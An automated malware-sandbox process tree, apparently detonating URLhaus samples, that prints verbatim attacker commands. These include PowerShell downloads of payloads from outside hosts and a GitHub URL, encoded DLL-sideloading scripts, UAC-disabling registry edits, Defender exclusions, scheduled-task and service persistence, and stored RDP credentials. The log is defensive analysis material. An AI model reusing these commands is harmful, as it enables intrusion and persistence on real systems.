                                                  "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Accesses Microsoft Outlook profiles
                                                  • outlook_office_path
                                                  • outlook_win_path
                                                  PID:804
                                              • C:\Users\Admin\Downloads\UrlHausFiles\jeditor.exe
                                                "C:\Users\Admin\Downloads\UrlHausFiles\jeditor.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2780
                                              • C:\Users\Admin\Downloads\UrlHausFiles\7z.exe
                                                "C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2824
                                              • C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe
                                                "C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3380
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FCA0.tmp\FCA1.tmp\FCA2.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
                                                  5⤵
                                                    PID:1032
                                                    • C:\Windows\system32\cmdkey.exe
                                                      cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
                                                      6⤵
                                                        PID:6020
                                                      • C:\Windows\system32\mstsc.exe
                                                        mstsc /v: 211.168.94.177
                                                        6⤵
                                                        • Enumerates connected drives
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: AddClipboardFormatListener
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:248
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\22.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\22.exe"
                                                    4⤵
                                                    • Drops startup file
                                                    • Executes dropped EXE
                                                    PID:4088
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Adds Run key to start application
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3540
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:1196
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\test.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\test.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4256
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 236
                                                      5⤵
                                                      • Program crash
                                                      PID:2472
                                                  • C:\Windows\System32\msiexec.exe
                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:5356
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\server.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\server.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Enumerates connected drives
                                                    • Writes to the Master Boot Record (MBR)
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:3440
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5724
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\app64.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"
                                                    4⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                    PID:6004
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5288
                                                    • C:\Windows\system32\svchost.exe
                                                      "C:\Windows\system32\svchost.exe"
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5956
                                                    • C:\Windows\system32\audiodg.exe
                                                      "C:\Windows\system32\audiodg.exe"
                                                      5⤵
                                                      • Adds Run key to start application
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4404
                                                    • C:\Windows\system32\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe"
                                                      5⤵
                                                      • Adds Run key to start application
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:5628
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5048
                                                  • C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
                                                    "C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1944
                                                    • C:\Windows\system32\cmd.exe
                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\538A.tmp\538B.tmp\538C.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
                                                      5⤵
                                                        PID:3892
                                                        • C:\Windows\system32\mshta.exe
                                                          mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
                                                          6⤵
                                                          • Access Token Manipulation: Create Process with Token
                                                          PID:4636
                                                          • C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
                                                            "C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6052
                                                            • C:\Windows\system32\cmd.exe
                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\56A7.tmp\56A8.tmp\56A9.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"
                                                              8⤵
                                                                PID:2296
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                                                                  9⤵
                                                                  • UAC bypass
                                                                  PID:768
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                                                                  9⤵
                                                                  • UAC bypass
                                                                  PID:4600
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                                                                  9⤵
                                                                  • UAC bypass
                                                                  PID:4280
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
                                                                  9⤵
                                                                    PID:668
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg query HKEY_CLASSES_ROOT\http\shell\open\command
                                                                      10⤵
                                                                        PID:2584
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                                                                      9⤵
                                                                      • Enumerates system info in registry
                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:4784
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff982af3cb8,0x7ff982af3cc8,0x7ff982af3cd8
                                                                        10⤵
                                                                          PID:4012
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,15702330655111578344,8309107223688656859,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
                                                                          10⤵
                                                                            PID:5952
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,15702330655111578344,8309107223688656859,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
                                                                            10⤵
                                                                              PID:2924
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,15702330655111578344,8309107223688656859,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
                                                                              10⤵
                                                                                PID:5576
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15702330655111578344,8309107223688656859,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                10⤵
                                                                                  PID:4912
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15702330655111578344,8309107223688656859,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
                                                                                  10⤵
                                                                                    PID:5288
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15702330655111578344,8309107223688656859,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
                                                                                    10⤵
                                                                                      PID:5508
                                                                                  • C:\Windows\system32\attrib.exe
                                                                                    attrib +s +h d:\net
                                                                                    9⤵
                                                                                    • Sets file to hidden
                                                                                    • Views/modifies file attributes
                                                                                    PID:4620
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                                                                                    9⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    PID:1380
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                                                                                    9⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:2856
                                                                        • C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
                                                                          "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:5124
                                                                    • C:\Users\Admin\AppData\Local\Temp\5E19.tmp.x.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\5E19.tmp.x.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1340
                                                                    • C:\Users\Admin\AppData\Local\Temp\72EA.tmp.zx.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\72EA.tmp.zx.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:6096
                                                                      • C:\Users\Admin\AppData\Local\Temp\72EA.tmp.zx.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\72EA.tmp.zx.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:5836
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
                                                                      2⤵
                                                                        PID:3328
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
                                                                          3⤵
                                                                          • Blocklisted process makes network request
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:5600
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
                                                                            4⤵
                                                                              PID:4656
                                                                            • C:\Windows\system32\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
                                                                              4⤵
                                                                                PID:5160
                                                                                • C:\Windows\system32\xcopy.exe
                                                                                  xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
                                                                                  5⤵
                                                                                    PID:5172
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
                                                                                  4⤵
                                                                                    PID:2968
                                                                                  • C:\Windows \System32\printui.exe
                                                                                    "C:\Windows \System32\printui.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                    PID:2192
                                                                                    • C:\WINDOWS\SYSTEM32\cmd.exe
                                                                                      cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
                                                                                      5⤵
                                                                                        PID:1064
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
                                                                                          6⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:1512
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                                                                                        5⤵
                                                                                          PID:5172
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:1084
                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                          cmd.exe /c sc create x498196 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x498196\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x498196.dat" /f && sc start x498196
                                                                                          5⤵
                                                                                            PID:5244
                                                                                            • C:\Windows\System32\sc.exe
                                                                                              sc create x498196 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                              6⤵
                                                                                              • Launches sc.exe
                                                                                              PID:3472
                                                                                            • C:\Windows\System32\reg.exe
                                                                                              reg add HKLM\SYSTEM\CurrentControlSet\services\x498196\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x498196.dat" /f
                                                                                              6⤵
                                                                                              • Server Software Component: Terminal Services DLL
                                                                                              • Modifies registry key
                                                                                              PID:5752
                                                                                            • C:\Windows\System32\sc.exe
                                                                                              sc start x498196
                                                                                              6⤵
                                                                                              • Launches sc.exe
                                                                                              PID:3572
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                            5⤵
                                                                                              PID:5784
                                                                                              • C:\Windows\System32\console_zero.exe
                                                                                                "C:\Windows\System32\console_zero.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:6048
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
                                                                                              5⤵
                                                                                                PID:3688
                                                                                                • C:\Windows\System32\bav64.exe
                                                                                                  "C:\Windows\System32\bav64.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:280
                                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\UrlHausFiles\urlhaus_urls.txt
                                                                                          2⤵
                                                                                          • Opens file in notepad (likely ransom note)
                                                                                          PID:3228
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
                                                                                          2⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Enumerates system info in registry
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:436
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99464cc40,0x7ff99464cc4c,0x7ff99464cc58
                                                                                            3⤵
                                                                                              PID:5184
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1808 /prefetch:2
                                                                                              3⤵
                                                                                                PID:540
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2148,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                                3⤵
                                                                                                  PID:4420
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2204,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2244 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:4232
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1
                                                                                                    3⤵
                                                                                                      PID:3724
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:1
                                                                                                      3⤵
                                                                                                        PID:1772
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3116,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3552 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:3856
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4668,i,1234317404242519334,4155265766695909955,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8
                                                                                                          3⤵
                                                                                                            PID:4828
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
